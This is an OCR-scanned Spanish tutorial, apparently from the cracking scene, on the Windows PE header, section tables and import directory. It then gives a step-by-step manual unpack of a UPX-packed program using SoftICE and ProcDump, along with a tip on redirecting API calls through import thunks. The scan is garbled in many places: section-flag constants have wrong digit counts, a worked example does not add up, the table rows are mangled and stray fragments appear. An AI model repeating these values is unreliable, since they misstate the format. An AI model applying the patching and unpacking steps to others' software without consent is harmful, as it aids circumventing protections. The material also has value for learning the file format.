Es la dirección virtual relativa a la base del archivo. Esta información la suministra el campo ImageBase del conjunto de 
campos opcionales del encabezado opcional NT (estructura _IMAGE_OPTIONAL_HEADER). Para NOTEPAD.EXE, 
este valor está en el desplazamiento 00B4h y es 0000 0040, invertido 0040 O0000h. La experiencia dice que este es el 
valor por defecto elegido por los enlazadores como base para los archivos EXE con formato PE. 


Entonces, en el caso de NOTEPAD.EXE, el programa inicia en la dirección virtual Base_de_la_Imagen + 
Punto_de_Entrada: 0040 0000h + 0000 1000h = 0040 1000h. 


Generalmente, 0040 1000h es la dirección virtual de la entrada de los programas en archivos ejecutables con formato PE. 


Esto lo podemos comprobar rápidamente ejecutando NOTEPAD.EXE con el cargador (LOADER) de SICE. Veremos en 
la ventana desplegada por SICE al detenerse en la primera instrucción que el depurador (DEBUGGER) apunta a la 
dirección 00401000h. 


- Alineamientos - 


Para el archivo con formato PE se dan dos alineamientos. El alineamiento de las secciones, campo SectionAlignment, y 
alineamiento de archivo, campo File Alignment. Estos campos son relevantes porque determinan cuanta memoria destina 
el sistema para las secciones y el archivo. 


Los ejecutables W32 no están divididos en segmentos de hasta 64 KB, como en DOS, sino en secciones cuyo tamaño es 
el múltiplo de una página de memoria. El tamaño de una página de memoria es de 4 KB. Si una sección ocupa 8 páginas 
de memoria, su tamaño es de 8*4=32 KB. 


Cada sección del archivo PE es cargada secuencialmente en el espacio de direcciones de un proceso, comenzando en 


ImageBase. El campo SectionAlignment dicta la cantidad mínima de espacio que una sección puede ocupar cuando es 
cargada --es decir, las secciones están alineadas sobre los límtes o fronteras de SectionAlignment. 


El alineamiento de sección no puede ser menor al tamaño de una página (generalmente 4096 bytes en la plataforma x86) 
y debe ser, en todo caso, un múltiplo del tamaño de la página, tal como dicta el manejador de memoria virtual de 
Windows. El enlazador (LINKER) establece un valor de 4096 bytes por defecto, pero esto puede establecerse usando del 
conmutador de enlazador: -ALIGN. 


Por ejemplo, si una sección del programa tiene un tamaño de 1200 bytes, el enlazador asignará a esta sección una página, 
es decir 4096 bytes. Entonces, cuando el programa sea cargado en RAM, el sistema comprometerá una página de 
memoria física para esta sección. 


Para NOTEPAD.EXE, SectionAlignment se encuentra en el desplazamiento OB8h y tiene un valor de 0000 1000h = 
4096 bytes, que es el tamaño de una página. 


El campo File Alignment informa sobre la granularidad mínima de trozos (chunks) de información dentro de la imagen 
antes de ser cargada. Por ejemplo, el enlazador llena con ceros (zero-pads) un cuerpo de sección (datos brutos [raw data] 
para una sección) por encima del límite o frontera más cercana de File Alignment en el archivo. Este valor, 
FileAlignment, está restringido a ser una potencia de 2 entre 512 y 65,535. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (un sector de disco 
tiene un tamaño de 512). 


En NOTEPAD.EXE, FileAlignmentse encuentra en el desplazamiento OBCh y tiene un valor de 0000 0200h = 512 bytes. 
- Tamaño de la imagen - 


Otro campo indispensable es SizeOflmage, ya que para montar el archivo W32 necesita reservar espacio en memoria. 
Esta información se encuentra en el campo SizeOfImage. Este valor no es propiamente el tamaño del ejecutable sino la 
cantidad de espacio que se reserva en el espacio de direcciones para cargar el ejecutable. Este número depende bastante 
del valor SectionAlignment. 


Si un archivo tiene seis secciones, alineadas sobre fronteras de 65,536 bytes, el campo SizeOflmage debería ser 6 * 
65.536 = 393.216 bytes (96 páginas). El mismo archivo enlazado con un alineamiento de sección de 4096 bytes (1 
página) debería dar 6 * 4096 = 24576 bytes (6 páginas) en el campo SizeOfImage. Pero esto sólo es así si todas las 
secciones tienen el mismo tamaño. Puede haber secciones con un tamaño mayor al de una página, lo cual cambia el valor 
de SizeOfImage. 


Podemos calcular SizeOflmage para NOTEPAD.EXE. Tiene 6 secciones y su valor SectionAlignement es 1000h = 4096 
bytes, entonces SizeOflmage debería ser 6 * 1000h = 6000h, sin embargo este no es el caso. 


En NOTEPAD.EXE SizeOfImage está en el desplazamiento OODOh, cuyo contenido es DOCO 0000h, que invertido es 
0000 COOOh. Esto es así porque seguramente hay secciones con un tamaño mayor a una página de memoria. 


- Directorio de Datos - 


Al final del encabezado opcional hay un directorio, que ocupa el campo DataDirectory. Se trata de un vector o arreglo 
(array) que guarda las direcciones donde se encuentran las tablas de datos de las secciones del archivo. Cada una de estas 
entradas tiene un tamaño de 8 bytes y se divide en dos campos. El primero indica la dirección virtual relativa a la base 
donde se encuentra la tabla con datos acerca de alguna sección. El otro campo dice el tamaño de la tabla. Cada entrada de 
este directorio tendría entonces la siguiente estructura: 


_IMAGE DATA DIRECTORY STRUC 

VirtualAddress DD ? ; Dirección virtual donde está la tabla 
Size DD ? ; Tamaño de la tabla 
_IMAGE_ DATA DIRECTORY ENDS 


PIMAGE_DATA_DIRECTOR Y TYPEDEF NEAR PTR _IMAGE_DATA_DIRECTORY 


El número de entradas del directorio está indicado en el campo NumberOfRvaAndSizes del encabezado opcional. 
Generalmente este valor es 0000 0010h=16D. El tamaño del directorio de datos sería el valor igual al número de entradas 
por ocho bytes de cada entrada. En este caso es 128 bytes. En NOTEPAD.EXE este valor está en el desplazamiento 
00F4h y contiene 1000 0000, que invertido es 0000 0010h = 16d, es decir, 16 entradas en el directorio de datos. 


De acuerdo al archivo WINNT. H, las siguientes son las entradas del direcorio de datos. 


; Números correspondientes a las entradas del directorio de datos 


IMAGE_DIRECTORY_ENTRY_EXPORT EQU 0 
IMAGE_DIRECTORY_ENTRY_IMPORT EQU 1 
IMAGE_DIRECTORY_ENTRY_RESOURCE EQU 2 
IMAGE_DIRECTORY_ENTRY_EXCEPTION EQU 3 
IMAGE_DIRECTORY_ENTRY_SECURITY EQU 4 
IMAGE_DIRECTORY_ENTRY_BASERELOC EQU 5 
IMAGE_DIRECTORY_ENTRY_DEBUG EQU 6 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT EQU 7 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR EQU 8 
IMAGE_DIRECTORY_ENTRY_TLS EQU 9 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG EQU 10 


El número que se asigna a cada entrada de directorio de datos se emplea para facilitar las rutinas de búsqueda de 
información sobre las secciones. 


VERIFIQUEMOS 


Ahora cerremos HEX WORKSHOP. Tomemos nota de los valores que hemos encontrado. Abramos NOTEPAD.EXE en 
EXESCOPE o en PROCDUMP y comparemos los valores desplegados con los que hemos obtenido hasta ahora. Para 
esta evaluación es mejor usar EXESCOPE ya que muestra el nombre de los encabezados y los desplazamientos donde 
están los datos. 


Comparemos entonces... Nada mal ¿cierto? 


Este proceso de ubicación manual, que puede ser tan engorroso hacerlo de esta manera, lo realiza el cargador de 
Windows de una manera muy rápida y automática. También es el mismo proceso seguido por los volcadores y editores 
de encabezados de archivos PE. 


MÁS CABEZAS ¡HASTA CUÁNDO! 


La información sobre las secciones del archivo PE se encuentra en las tablas de secciones, después del encabezado 
opcional están, ordenadas secuencialmente. Cada una de estas tablas tiene la siguiente estructura: 


_IMAGE_SECTION_HEADER STRUC 

Name DB 8 DUP ( ? ) ; Cadena con el nombre de la sección 
3 

; Misc 

3 

tag$0 <> 

VirtualAddress DD ? 

Size OfRawData DD ? 

PointerToRawData DD ? 

PointerToRelocations DD ? 


PointerToLinenumbers DD ? 
NumberOfRelocations DW ? 
NumberOfLinenumbers DW ? 
Characteristics DD ? 

_IMAGE _SECTION_HEADER ENDS 


PIMAGE_SECTION_HEADER TYPEDEF NEAR PTR _IMAGE_SECTION_HEADER 


tag$0 UNION 
PhysicalAddress DD ? 
VirtualSize DD ? 
tag$0 ENDS 


Espero que ya no se necesite presentar esta estructura con una tabla de desplazamientos. 


El primer campo de la tabla es una arreglo (array) de 8 bytes de largo donde se escribe una cadena de caracteres con el 
nombre de la sección. Sigue una unión con el tamaño virtual de la sección. Luego el campo VirtualAddress es la 
dirección virtual relativa a la base de la imagen donde se encuentra la sección. 


Size OfRawData es el tamaño del FileAlignment relativo al cuerpo de la sección. El tamaño actual del cuerpo de la 
sección será menor o igual al múltiplo de FileAlignment. Una vez que la imagen es cargada dentro del espacio de 
direcciones de un proceso, el tamaño del cuerpo de la sección llega a ser menor o igual a un multiplo de 


SectionAlignment. PROCDUMP despliega este campo bajo el nombre "RAW DATA". 


PointerToRawData es el desplazamiento a la localización del cuerpo de la sección en el archivo. PROCDUMP llama a 
este campo "RAW OFFSET". 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos inicializados 
o no inicializados, si se puede escribir y leer sobre la sección, si es 

ejecutable, si es compartible, etc. PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las 
equivalencias: 


- 0OOO0000020h __Código. 

- 0O00000040h __Datos inicializados. 

- 0OO0000080h __Datos no inicializados. 

- 040000000h __ Sección cacheable. 

- 080000000h __Sección paginable. 

- 100000000h __ Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Por ejemplo, si las características es ED000020H, entonces se trata de una sección en la que 


1. se pueden escribir datos 80000000h 
2. se pueden leer datos 40000000h 


3. se pueden compartir datos 10000000h 
4. hay código 00000020h 


E0000020h 
Se trata de una sección con código ejecutable. Esta comúnmente lleva como nombre .text. 
Hay una tabla de estas para cada sección. NOTEPAD.EXE tiene seis secciones, por lo que tiene seis tablas de secciones. 
Abramos de nuevo NOTEPAD.EXE con el editor hexadecimal. 


En NOTEPAD.EXE la primera tabla se encuentra en el desplazamiento 0178h. Visualmente es simple ubicarla con el 
editor hexadecimal ya que cada tabla se inicia con el campo Name, que es un campo de ocho bytes con una cadena de 
caracteres ASCH con el nombre de la sección. El nombre de la primera sección en NOTEPAD.EXE es .text. Es el 
nombre que por defecto se asigna a la sección con código ejecutable. 


Hay varias secciones predefinidas, cuyos nombres son: 


- Sección de código ejecutable: .text 

- Secciones de datos: .bss, .rdata, .data 

- Sección de recursos: .rsrc 

- Sección de datos exportados: .edata 

- Sección de datos importados: .idata 

- Sección de información para depuración: .debug 


"Export" contiene información sobre los nombres que exporta el programa y pueden ser solicitados y usados por otros 
procesos. 


"Import" indica las funciones que el programa solicita a otros; generalmente son funciones que se encuentran en las DLL 
del sistema, donde se encuentran las funciones de la API de Windows, que son incluidas en los prototipos que definen las 
funciones empleadas en el programa. 


"Resources" contiene información sobre los recursos que contiene el programa: menúes, diálogos, iconos, bitmaps, 
cadenas de texto, etc. 


"Debug" es la sección donde el enlazador, si así lo quizo el programador, guarda información para facilitar la depuración 
del programa, con un depurador (debugger). 


El siguiente campo de una entrada del directorio de datos, después del nombre, es una unión con el tamaño de la sección. 
La dirección virtual donde se encuentra la sección está en el campo VirtualAddress. La dirección física de la sección está 
en PointerToRawData. 


TABLAS DE DATOS 


Cada sección tiene una tabla, generalmente al comienzo, con información particular sobre ella. 


Para localizar una tabla de éstas, se determina su dirección virtual relativa (RVA: RELATIVA VIRTUAL ADDRESS). 


Este valor está en el primer campo de la entrada correspondiente en el directorio de datos. Luego se usa esta dirección 
virtual para determinar en cuál sección está. 


La dirección física de la sección nos la dá el campo PointerToRawData de la tabla de sección. La tabla de datos de la 
sección está en un desplazamiento igual al dato en el campo VirtualAddress en la entrada del directorio de datos, al final 
del encabezado opcional, menos el dato del campo VirtualAddress en la tabla de sección correspondiente. Este 
desplazamiento es relativo a la dirección en el campo PointerToRawData. 


Como vimos, las tablas de secciones se encuentran inmediatamente después del directorio de datos, es decir después del 
encabezado opcional. 


Con la dirección física del desplazamiento a la primera tabla de las secciones de la imagen, con el número de secciones 
de la imagen (en el campo NumberOfSection del encabezado PE, la RVA donde inicia la sección, la RVA de la tabla de 
datos de la sección y el puntero a los datos brutos de 

la sección PointerToRawData, puedo localizar donde se hallan los datos que conforman la tabla de datos de una sección. 


Como ilustración localicemos la tabla de la sección de nombres importados .idata en NOTEPAD.EXE. 


Primero buscamos en el directorio de datos la entrada que corresponde a .idata. Es la entrada número 1, es decir, la 
segunda porque la primera es la número O (véase los números correspondientes a las entradas del directorio de datos). En 


NOTEPAD.EXE localizamos esta entrada en el desplazamiento 0100h, que inicia con el campo Virtual Address de la 
entrada del directorio que dice la dirección virtual donde se ubica la tabla de datos de la sección .idata. El valor es 0070 
0000, que invertido es 0000 7000h. 


Luego localizamos el segundo campo de la tabla de sección correspondiente a .idata. Este campo se llama también 
VirtualAddress e indica la dirección virtual donde inicia la sección. Para encontrarlo manualmente, buscamos la cadena 
".idata"; la tabla de sección correspondiente a esta sección inicia en el deplazamiento donde hallamos esa cadena. Este 
campo se ubica, en NOTEPAD.EXE, en O1FO0. El campo Virtual Addres de esta sección estará entonces en O1FC, ya 
que el primer campo, donde está la cadena con el nombre, tiene 8 bytes y el siguiente campo, con el tamaño de la 
sección, tiene 4 bytes. El valor en O1FC es 0000 7000h. Quiere decir que la tabla de datos de la sección se encuentra en 
el inicio de ésta. 


Ya que hemos localizado la tabla de seccción, obtenemos el valor del campo PointerToRawData. Este campo lo 
ubicamos en 0204, y contiene 0042 0000, que invertido es 0000 4200h. Es el desplazamiento del archivo donde están los 
datos brutos de la sección. 


Con estos datos ya podemos localizar la tabla de datos de la sección .idata en NOTEPAD.EXE. Resto la dirección virtual 
de la sección (campo VirtualAddress de la tabla de sección) a la dirección de la tabla de datos de esa sección (campo 
VirtualAddress en el directorio de datos). En este caso, la diferencia es cero: la tabla de datos está al inicio de la sección. 
A la diferencia obtenida le sumo el valor del campo PointerToRawData y obtengo el desplazamiento donde se encuentra 
la tabla de datos de la sección .idata. Como la dirección virtual de la sección coincide con la dirección de su tabla de 
datos, el desplazamiento dentro del archivo, donde se encuentra la tabla de datos de la sección .idata, coincide el valor en 
PointerToRawData: 4200h. 


Puede parecer un proceso muy complejo. Pero basta imaginar lo que significaría que el cargador del SO tuviera que 
buscar de manera secuencial en un ejecutable de 3.2 MB, por ejemplo, qué funciones el programa importa de las librerías 
DLL del sistema. 


Bien, ahora que hemos localizado la tabla de datos de la sección, podemos buscar en ella los nombres importados. 


La tabla de datos de la sección de datos importados tiene también una estructura de directorio, es decir, es una tabla con 


varias entradas con la misma estructura cada una. Por este motivo podemos llamar a esta tabla Directorio de Datos 
Importados, cuyas entradas tienen la siguiente estructura, que llamamos IMAGE_IMPORT_DESCRIPTOR: 


IMAGE_IMPORT_DESCRIPTOR struc 
dwRVAFunctionNameList DWORD ? ; 
TimeDateStamp DWORD ?; 
ForwarderChain DWORD ?; 
dwRVAModuleName DWORD ?; 
dwRVAFunctionAddressList DWORD ?2; 
IMAGE _IMPORT_DESCRIPTOR ends 


PIMAGE_IMAGE_IMPORT_DESCRIPTOR TYPEDEF PTRIMAGE_IMPORT_DESCRIPTOR 


Hay tantas entradas de este tipo como módulos importados sean importados. Es decir, hay una entrada ImportDirectory 
para cada módulo importado. 


El primer campo, dwRVAFunctionNameList, apunta a un arreglo (array) de punteros a estructuras llamadsa 
IMAGE_IMPORT_BY_NAME, que son las listas con los nombres y ordinales de las funciones a usar del módulo 
importado. 


TimeDateStamp indica cuando el archivo fue fabricado. 


Uno de los campos importantes de esta estructura es dwRV AModuleName, una dirección virtual relativa a la base que 
apunta al nombre del módulo importado. 


Si resto al valor de dwRV AModuleName la dirección virtual de la sección, obtengo el desplazamiento desde el inicio de 
la sección. 


En NOTEPAD.EXE, el campo dwRV AModuleName está en el desplazamiento 4200h + 4 + 4 + 4 = 420Ch, y contiene 
E874 0000, que invertido es 0000 74E8h. La dirección virtual de la sección .idata es 7000h. Entonces el nombre del 
primer módulo importado se encuentra en: 


0000 74E8h - 0000 70000h = 0000 04E8h + 0000 4200h = 0000 46E8h. 


En el desplazamiento 46E8h encuentro una cadena con el primer módulo importado por NOTEPAD.EXE: Shel132.dll. 
Este nombre estará antecedido por el nombre de una de las funciones importadas del módulo y estará seguido por las 
demás funciones. 


El campo dwRVAFunctionNameList apunta a la lista de punteros a los nombres de las funciones importadas en el 
módulo. Confirmemos esto en NOTEPAD.EXE. 


El campo dwRVAFunctionNameList está en 4200h y contiene 0000 7160h, lo que indica que la lista de punteros a 
nombres importados del módulo correspondiente está en: 


0000 7160h - 0000 70000h = 0000 0160h + 4200h = 0000 4360h. 


El valor en este desplazamiento es 000 74D8. Es la dirección virtual de la lista de nombres: 


0000 74D8 - 0000 7000 = 0000 04D8h + 4200h = 0000 46D8h. 


Si vamos a esta dirección encontraremos que contiene el número 004Eh, seguido por la cadena 'ShellExecuteA"'. El 
primer número es el ordinal de exportación de la función con que inicia la lista de nombres importados del módulo, y la 
cadena es el nombre de la función. El ordinal es un número de referencia que puedo emplear para llamar a la función 
importada si no poseo su nombre. 


El campo dwRVAFunctionAddressList es sumamente importante. Apunta también a un arreglo (array) donde el cargador 
de W32 coloca la dirección virtual del punto de entrada de la función importada. Esto es de sumo interés: cuando el 
cargador monta el programa en RAM llena este arreglo con las direcciones virtuales donde inician las funciones 
importadas. Cuando el programa llama a una de estas funciones lo hace indirectamente a través de una llamada como 
esta: 


¡mp [RVA del THUNK] 


El campo dwRVAFunctionAddressList está, en NOTEPAD, en 0000 4210h, y contiene el valor 0000 7370h, ya 
invertido. Quiere decir que apunta a: 


7370 - 7000 = 0370 + 4200 = 4570h : <-- dwRVAFunctionAddressList 
Anota este número. 
Ahora fíjate. Desensambla NOTEPAD.EXE con W32DASM. Busca la cadena "ShellExecuteA" hasta llegar a: 


* Reference To: SHELL32.ShellExecuteA, Ord:004Eh | 
:00402DEE FF1570734000 Call dword ptr [00407370] 


Es una típica llamada a una función API de W32. Tiene la forma "CALL DWORD PTR [THUNK RVA]. "THUNK 
RVA" es la RVA donde el cargador de W32 coloca la dirección virtual donde inicia la función importada en el espacio 
de direcciones del proceso. Si con un programa como OFFSET (de Ieczelion) o OFFCAL (de MrCrimson) revisas el 
desplazamiento en el archivo que corresponde a la dirección de memoria 00407370, verás que esta dirección corresponde 
al desplazamiento 000 4570h, el mismo apuntado por el campo dwRVAFunctionAddressList correspondiente a la 


información sobre "ShellExecuteA”. 


No olvides esto último, porque es muy útil para redirigir los llamados a funciones de la API de W32. 


Tenemos ya una idea de como se estructura el encabezado significado de sus campos. Todavía queda analizar otras 
importantes secciones predefinidas, como la sección de recursos .rcrs. Es una de las secciones más atractivas de los 
archivos PE. Debido a la complejidad de su estructura, prefiero diferir por ahora su análisis, ya que implica un concepto 
fundamental para el programador: árbol de búsqueda. Se trata de un concepto de datos estructurados que merecería una 
atención especial. 


De todos modos hagamos un ejercicio para consolidar conocimientos. 


Os 
Vi 


Al Atake 


DESEMPAQUETANDO EJECUTABLES 


Como ejercicio podemos tomar cualquier archivo ejecutable y examinar el encabezado con un editor hexadecimal, anotar 
los valores críticos y después comprobar si hemos acertado con cualquier volcador (dumper) de archivos PE, como 
EXESCOPE o PROCDUMP. 


Empleemos PROCDUMP y tomemos como víctima SNIPPETCREATOR de Iczelion. 

Se trata de un fabuloso programa ideado por un experto en W32 ASM. Además de permitir editar los encabezados de los 
archivos PE, sirve para insertar SNIPPETS (recortes) en archivos PE. En otras palabras, este programa permite insertar 
código en ejecutables, no sólo cambiar unos cuantos bytes, sino rutinas enteras. 


Para ver un poco la importancia de conocer los encabezados PE, este programa resulta ejemplar. Veamos. 


Supongamos que queremos hacer una lista muerta de SNIPPETCREATOR. Lo abrimos con WDASM232 8.9 o con IDA. 
¡Qué extraño!. No vemos llamado a ninguna APT W32. 


Carguemos el programa con SICE ¡Cáspita!, ¿qué pasa...?. No se despliega el programa en la ventana de SICE. Se abre 
directamente. 


Ahora despleguemos SICE (ctrl+D). Instalemos un BRKP: BPX GetModuleHandleA. Ahora ES y volvemos a Win. 
Iniciemos SNIPPETCREATOR. ¡Ahora sí! Se despliega SICE. Tecleamos F11 y ya estamos en SNIPPETCREATOR. 
Hacemos alt+C y bajamos por la ventana de código. Ahora si encontramos un montón de llamadas a APIs W32. Esto no 
se entiende. ¿De dónde salieron estas 

llamadas que no aparecieron en la lista muerta? 


Tal vez si hacemos un volcado con un editor de archivos PE, como PROCDUMP, podamos encontrar alguna orientación. 
Abramos SNIPPETCREATOR con el editor de PROCDUMP. 


¿Qué vemos en la ventana PE Structure Editor? El campo "Entry Point" (punto de entrada) tiene el valor 00018037h. 
Qué rareza. Generalmente este valor es 00001000h para los ejecutables PE. 


Veamos ahora el editor de estructuras (Struct Editor): pulsemos el botón "Sections". Caramba: ninguna sección del 
archivo lleva nombre predefinido. Los nombres que encontramos son: UPX0O, UPX1 y UPX3. El archivo tiene tres 
secciones con nombres no predefinidos. 


Ahora resumamos las observaciones: 

1. Encontramos diferencias entre la lista muerta generada por WDASM y el despliegue en memoria que nos presenta 
SICE. 

2. El punto de entrada del programa no es el convencional. 

3. Las secciones no tienen nombres predefinidos. 

4. El programa no es desplegado inmediatamente en SICE con el LOADER 


De 1 ya podemos deducir que el archivo está encriptado o empaquetado. Cuando generamos la lista muerta, lo que 
conseguimos es el código empaquetado. Para ejecutar el programa, el sistema debe montarlo en RAM, entonces debe 
desempaquetarlo primero. Esta es la importancia de los cargadores (LOADERS), desempaquetan los archivos y 
despliegan su contenido desempaquetado en memoria. Una vez hecho esto, podemos ver su verdadero contenido, incluso 
hasta volcarlo (dumping) a un archivo en disco duro. Esto explica la diferencia entre la lista muerta y el despliegue de 
SICE. 


El punto 2 apoya nuestra primera conclusión. El programa inicia no en su primera instrucción sino en otra, inicia en el 
código que va desempaquetando el programa original. 


El punto 3 es interesante ya que comienza a mostrarnos la importancia de conocer sobre los encabezados PE. Los 
nombres de las secciones, aunque no son los predefinidos, comienzan todos por el mismo prefijo: UPX. Si el archivo está 
empacado, el empacador utilizado cambia el nombre a las secciones y les asigna nuevos que inician con UPX. Veremos 
que con este dato es suficiente para desempacar SNIPPETCREATOR con PROCDUMP. 


El punto 4 nos dice que la sección con las instrucciones ejecutables del programa no tiene asignado los atributos 
correctos. Esto lo veremos luego. 


Nuestro análisis del punto 3 nos permite que ya procedamos a desempaquetar nuestra víctima. Pulsemos el botón 
"UNPACK" de PROCDUMP. En la caja de diálogo "Choose Unpacker" vemos una lista de desempacadores. 
Naveguemos por la lista. Aún sin saber mucho de desempacadores damos de inmediato con el desempacador correcto: 
UPX. Doble click sobre él, escogemos SNIPPETCREATOR, lo desempacamos y lo guardamos en disco duro. 


Ahora abramos el archivo desempaquetado con el PE Editor de PROCDUMP. ¡WAO!: ha cambiado el valor del punto 
de entrada, ahora es 00001000h, el convencional. Ahora echemos un vistazo en "Sections". ¡DE NUEVO WAO!: Ahora 
tenemos cuatro secciones. A las anteriores tres UPXs se agrega .idata, es decir, la sección con datos sobre nombres 
importados. 


También han cambiado las características (CHARACTERISTICS) y los desplazamientos virtuales (Virtual Offset) para 
las secciones. De esto hablaremos luego. 


Ahora hagamos una lista muerta del archivo desempacado. Con WDASM aparecen las llamadas a APIs aunque por 
ordinales. Con IDA PRO sí aparecen las llamadas a las APIs por nombre. El archivo ha sido desempaquetado. Ahora 
podemos sentarnos cómodamente a analizarlo y aprender como se hace un buen editor de archivos PE. 


En realidad no necesitamos PROCDUMP para hacer el desempaquetado. Sólo necesitamos hacer un volcado del 
encabezado PE y ver los nombres de las secciones para identificar el desempaquetador. También, conociendo el formato 
del encabezado, es suficiente abrir el archivo con un buen editor hexadecimal y buscar "manualmente" el encabezado de 
tablas de secciones y veremos los nombres incriminadores que revelan el empacador empleado. 


A propósito, podemos encontrar UPX en http://www.nexus.hu/upx/. Es freeware. Para el momento en que escribo esto, la 
versión disponible es la v0.84. Si comparamos la diferencia de tamaño entre el ejecutable empaquetado y el 
desempaquetado, nos daremos cuenta de la calidad de este empaquetador. No desempaca paquetes de versiones 
anteriores, así que no sirve para desempacar SNIPPETCREATOR v1.05. 


Ahora hasta podemos renombrar las secciones con los nombres predefinidos correspondientes, si quisieramos. Esto 
puede ser útil en ciertas ocasiones que por ahora no pienso mencionar. 


Ahora, supongamos que no tenemos a la mano el desempaquetador preciso, ni tampoco lo suministra PROCDUMP. 
Entonces podemos recurrir a otro método, el descrito por Volatily en su artículo Manually Unpacking - ASPack 
v1.083, que se puede conseguir en el inmeso WEB site de fravia. Es un método un tanto engorroso, pero funciona. Lo 


único es que no desempaca la sección .idata, entonces cuando lo desensamblamos no aparecen los nombres de las 
funciones API W32 en sus llamadas. 


Resumo los pasos de este procedimiento para desempacar manualmente un archivo ejecutable: 


1. Abrimos la víctima (SNIPPETCREATOR) con el PE Editor de PROCDUMP. 
2. Anotamos el punto de entrada (Entry Point): 00018037h 

3. En el editor de estructuras (Structures Editor) pulso "Sections". 

4. Anotamos los datos de la ventana Sections Editor: 


Sections Informations : 


Name | VitualSize_ [VitualOftset_ | RiawSize__ | RawoOltset 


00016000 00001000 0000000 00000400 E0000040 
DODODE50 00017000 00001000 00000400 C0000040 
UP2 00005029 00018000 00005029 00001400 E0000020 


5. Buscamos una sección ejecutable con la bandera de datos inicializados. 
Es la sección UPXO: 


000000040h datos inicializados. 
200000000h ejecutable. 

400000000h se puede leer. 

800000000h se puede escribir en la sección. 


E00000040h 


7. Para que el programa pueda ser desplegado por SICE al iniciar, cambiamos las características de la sección UPXO para 
hacerla una sección de código: reemplazamos E00000040h por E00000020h. Para hacer esto pulsamos sobre el nombre 
de la sección con el botón derecho del ratón y elegimos Edit Section del menú despegado. Se despliega ahora la caja de 
diálogo Modify section value. Reemplazamos el valor en el campo "Section Characteristics". Ahora podemos desplegar 
el ejecutable con el LOADER de SICE y desplegarlos en la pantalla del depurador. Anotamos también el desplazamiento 
(Virtual Offset) de esta sección: 1000h. Seguramente será la dirección donde inicia el programa original. 


8. Cargamos la víctima con SICE. Bajamos por el código del programa empleando la tecla F10, teniendo cuidado de 
colocar puntos de ruptura (BREACKPOINTS) o trampas en las instrucciones inmediatamente después de aquellas donde 
hay saltos hacia arriba. Por ejemplo: 

en la instrucción 0041806F hay un salto hacia arriba: JB 00418060, lo que indica que se trata de un bucle de miles 
vueltas. Entonces hacemos establecemos una trampa en la instrucción siguiente: BPX 00418073, y tecleamos FS para 
pasar por alto este bucle. Este procedimiento debe repetirse para cada bucle encontrado, si no queremos tardar años. 


9. En cualquier momento llegaremos a las instrucciones: 


004181CA 61 POPPAD 
004181CB E9308EfEFF  JMP 00401000 


Es un salto a la dirección 00401000h, que es el desplazamiento donde suponemos que inicia el código original del 
programa. Basamos esta suposición en el hecho de que esta es la dirección que generalmente establece por defecto el 
enlazador como punto de entrada. también en el hecho de que una de las secciones, seguramente la de código (.text) 
inicia aquí. Para asegurarnos que este es el caso, hacemos BPX 004181CB y seguimos (F10). Cuando arribamos a la 
dirección 00401000h ya podemos ver llamadas a funciones W32 API. Quiere decir que estamos en la sección de código. 


10. FS para salir de SICE. Cerramos la víctima y la corremos de nuevo. Seguramente se desplegará SICE en algunos de 
los BREAKPOINTS que dejamos cuando saltábamos bucles grandes.Debemos pulsar ES hasta llegar a 004181CB. 


11. Cuando llegamos aquí, cambiamos la instrucción: 
004181CB E9308EfEFF JMP 00401000 


por: 
004181CB E9308EfEFF — JMP004181CB 


Lo hacemos así: 
a 004181CB ¡mp 004181CB 


12. FS para volver a Win. El programa se ha quedado en un bucle infinito en la memoria. Abrimos PROCDUMP. 
Buscamos en la ventana de tareas (Tasks) de PROCDUMP a la víctima. Pulsamos sobre ella con el botón derecho del 
ratón. Elegimos "Dump (Full)" en el menú desplegado y guardamos el archivo desempacado en disco. 


13. Matamos la tarea víctima. 


14. Cambiamos el punto de entrada: abrimos el archivo desplegado con el PE Editor de PROCDUMP, y reemplazamos el 
valor en Entry Point por 00001000. 


15. Abrimos el archivo ya desempaquetado. Perfecto: funciona. Como vemos su tamaño se ha incrementado una 
barbaridad, lo que indica la potencia del empaquetador UPX. 


Si desensamblamos este desempaquetado con WDASM o con IDA, veremos los problemas de este método de 
desempaquetado: no se desempaqueta la sección de importaciones .idata, por lo tanto, no se despliegan los nombres de 
las funciones W32 API. 


Los primeros bytes del archivo... ¿Corresponden siempre y únicamente a la cabecera? 


Imagino que sí. El encabezado puede diividirse en cuatro grandes partes. La primera es el viejo encabezado DOS. El 
último campo de este encabezado apunta a un campo con un par de caracteres que dicen el formato del archivo 
ejecutable. Ahora, imaginate que este encabezado no esté aquí. El cargador no podría encontrar el encabezado PE ni 
tampoco podría determinar si se trata de un archivo PE (W32) o NE (W16) o LE (052). Hay algunas direcciones que 
varían pero cuando esto ocurre, algún campo del encabezado especifica dónde han sido relocalizados los datos. 


El encabezado es una estructura de datos por la cual el cargador de W32 siempre se orienta para acelerar la carga del 
ejecutable en vez de implementar algún algorritmo inteligente de búsqueda que impicaría un mayor costo en cuanto 
tiempo y trabajo de programación. 


¿Cuantos bytes tiene la cabecera? 


Respecto al tamaño, hay un campo que especifica este valor y se llama SizeOfHeaders y está en el encabezado PE 
(estructura _IMAGE_FILE_HEADER). El valor varía de acuerdo al número de secciones u objetos del PE. 


El valor decimal de "size of image'' en ProcDump no corresponde al tamaño real del fichero. ¿Por qué? 


Esto es consecuencia de los alineamientos. Realmente este campo indica la cantidad de espacio que se reserva en el 
espacio de direcciones para cargar el ejecutable. Una cosa es la memoria virtual reservada y otra la memoria física 
comprometida. Yo puedo reservar 10 MB e ir comprometiendo bloques de 300 KB según la necesidad que tenga de ello. 
Evidentemente, la memoria reservada deberá ser igual o mayor al tamaño de la imagen. El valor de "size of image"que 
vemos, por ejemplo, en ProcDump depende del valor "SectionAlignement", es decir, del alineamiento de las secciones. 
Es uno de los campos opcionales de la estructura _IMAGE_FILE_HEADER. 


Una página mide 4096 bytes. Si un PE tiene 3 secciones, todas de un tamaño menor a 4096 bytes, y si estas, de acuerdo a 
SectionAlignement" están alineadas en límites de 65.536 bytes, el tamaño de la imagen será 3 * 65.356 = 196.608 bytes. 


